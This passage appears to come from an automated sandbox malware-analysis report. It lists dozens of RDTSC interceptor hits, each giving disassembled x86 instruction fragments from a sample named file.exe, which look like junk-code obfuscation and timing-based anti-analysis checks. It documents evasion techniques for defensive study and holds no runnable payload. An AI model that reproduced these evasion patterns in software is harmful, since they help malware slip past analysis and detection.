                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1E7B9 second address: B1E7BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EC9B second address: B1ECE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F4A80B11C38h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov esi, edi 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D2D60h] 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECE1 second address: B1ECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECE8 second address: B1ECEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECEE second address: B1ECF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1ECF2 second address: B1ED0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F4A80B11C3Fh 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F5B8 second address: B1F5C2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1FDC5 second address: B1FDCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B20E41 second address: B20E53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22A07 second address: B22A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B22A0D second address: B22A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B230F7 second address: B230FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B230FC second address: B2313C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F4A81237CC8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 movzx esi, ax 0x00000027 push 00000000h 0x00000029 add edi, 0E395FC0h 0x0000002f xchg eax, ebx 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 pop esi 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2313C second address: B23159 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4A80B11C43h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A55 second address: B23A6A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4A81237CCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A6A second address: B23A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C43h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A85 second address: B23ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F4A81237CC8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 sub dword ptr [ebp+122DB7D1h], ebx 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D19C6h] 0x0000002f call 00007F4A81237CD6h 0x00000034 mov esi, 6682D94Ah 0x00000039 pop esi 0x0000003a push 00000000h 0x0000003c mov di, D194h 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2460E second address: B24612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24612 second address: B2461C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2461C second address: B24620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24620 second address: B2467F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F4A81237CC8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 movsx ecx, cx 0x0000002c mov dword ptr [ebp+1244C317h], esi 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F4A81237CC8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push ebx 0x00000054 pop ebx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B276CE second address: B276D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B276D8 second address: B276F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A81237CD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B276F8 second address: B276FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27D0A second address: B27D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29CA8 second address: B29CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F4A80B11C36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27ECD second address: B27ED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F4A81237CC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29CB8 second address: B29CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD99D2 second address: AD99D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B3FF second address: B2B405 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B405 second address: B2B40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B40B second address: B2B411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD7EA4 second address: AD7EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2BB1C second address: B2BB39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CAD7 second address: B2CB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4A81237CC8h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F4A81237CC8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d movsx edi, cx 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 movzx ebx, dx 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F4A81237CCDh 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CB25 second address: B2CB2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CB2B second address: B2CB6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4A81237CD8h 0x00000008 jmp 00007F4A81237CD5h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4A81237CCBh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CE0B second address: B2CE15 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2DF2C second address: B2DF32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FD8F second address: B2FD99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4A80B11C36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FD99 second address: B2FD9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EE6D second address: B2EE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EE73 second address: B2EF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F4A81237CC8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 pushad 0x00000022 jnl 00007F4A81237CCCh 0x00000028 mov dword ptr [ebp+122DB7E2h], esi 0x0000002e popad 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov di, 8C89h 0x0000003a mov ebx, esi 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov ebx, dword ptr [ebp+122D2AA1h] 0x00000049 mov eax, dword ptr [ebp+122D0CD9h] 0x0000004f push 00000000h 0x00000051 push ecx 0x00000052 call 00007F4A81237CC8h 0x00000057 pop ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 00000015h 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 movsx ebx, si 0x0000006c push FFFFFFFFh 0x0000006e mov dword ptr [ebp+1244C8A8h], edx 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 push ebx 0x00000079 pop ebx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2EF01 second address: B2EF0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4A80B11C3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30CB6 second address: B30CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30CBB second address: B30D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4A80B11C40h 0x00000008 jmp 00007F4A80B11C3Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F4A80B11C38h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D17DDh], edx 0x00000031 or ebx, dword ptr [ebp+122D3889h] 0x00000037 push 00000000h 0x00000039 call 00007F4A80B11C43h 0x0000003e add edi, dword ptr [ebp+122D2619h] 0x00000044 pop ebx 0x00000045 push 00000000h 0x00000047 mov di, CBE1h 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FFF4 second address: B2FFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D32 second address: B30D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4A80B11C3Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FFF8 second address: B2FFFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D4A second address: B30D4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31D63 second address: B31D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30E63 second address: B30E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32DD0 second address: B32DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32DD4 second address: B32DDE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A80B11C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32DDE second address: B32DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A81237CD0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B32DF2 second address: B32DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B31FCA second address: B31FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34F78 second address: B34F8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35FB9 second address: B35FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35FBF second address: B35FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3860B second address: B3869D instructions: 0x00000000 rdtsc 0x00000002 je 00007F4A81237CC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F4A81237CC8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov bl, 1Fh 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F4A81237CC8h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 or dword ptr [ebp+12471810h], edx 0x0000004c push 00000000h 0x0000004e jl 00007F4A81237CDEh 0x00000054 jmp 00007F4A81237CD8h 0x00000059 xchg eax, esi 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F4A81237CD9h 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B350EC second address: B35101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A80B11C3Bh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3869D second address: B386A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34147 second address: B341D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4A80B11C38h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 adc bx, 3D3Ah 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov edi, dword ptr [ebp+122D2DB8h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov ebx, esi 0x00000041 mov eax, dword ptr [ebp+122D1251h] 0x00000047 jmp 00007F4A80B11C3Eh 0x0000004c push FFFFFFFFh 0x0000004e jmp 00007F4A80B11C44h 0x00000053 nop 0x00000054 push ebx 0x00000055 push edx 0x00000056 js 00007F4A80B11C36h 0x0000005c pop edx 0x0000005d pop ebx 0x0000005e push eax 0x0000005f pushad 0x00000060 jng 00007F4A80B11C3Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33064 second address: B33068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B351CB second address: B351CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B351CF second address: B351DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3620F second address: B36213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36213 second address: B36217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3972A second address: B3973C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4A80B11C38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3973C second address: B39741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3889D second address: B388BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4A80B11C46h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B39741 second address: B397A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov bx, ax 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F4A81237CC8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a jg 00007F4A81237CCBh 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F4A81237CC8h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov bx, 9A5Ah 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 jg 00007F4A81237CC6h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A6AC second address: B3A74A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A80B11C44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jno 00007F4A80B11C40h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F4A80B11C38h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov edi, dword ptr [ebp+122D2D50h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F4A80B11C38h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 and edi, 22B5D350h 0x00000056 mov edi, dword ptr [ebp+122D2E60h] 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F4A80B11C47h 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A74A second address: B3A76F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4A81237CCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4A81237CD1h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A76F second address: B3A773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3B7E3 second address: B3B7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4A81237CC6h 0x0000000a rdtsc
